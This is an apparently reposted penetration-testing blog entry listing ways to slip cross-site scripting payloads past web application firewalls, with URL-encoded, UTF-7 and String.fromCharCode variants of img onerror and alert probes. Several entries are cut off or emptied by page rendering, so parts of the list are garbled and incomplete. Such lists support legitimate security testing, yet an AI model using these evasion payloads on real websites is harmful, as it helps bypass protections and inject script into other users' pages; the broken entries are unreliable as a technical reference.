Cross site scripting,XSS,bypass XSS filter,xss payload

Cross Site Scripting (Cross Site Scripting, XSS) is a Web application attack in the data output to the page when there is a problem, leading to an attacker can be constructed malicious data displayed in the page vulnerability. Because the cross-site scripting attacks are to the page content to write a malicious script or HTML code, so cross-site scripting vulnerability is also known as HTML injection vulnerability.

How to bypass WAF:

Encoding bypass
Hex encode: alert(‘123’)jsfuck
Url encode: %3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E
Unicode encode: +ADw-img src+AD0-x onerror+AD0-prompt(1)+AD4-

magic_quotes_gpc bypass: String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)

close tag:

Case insensitive: alert(‘123’)

use other tag: XSS
<img a=”

use comment: %0aalert(1);

Two-letter bypass:


Other events bypassonload

The post Cross site scripting (XSS) :Some techniques to bypass WAF appeared first on Penetration Testing in Linux.


Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do

Você está comentando utilizando sua conta Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s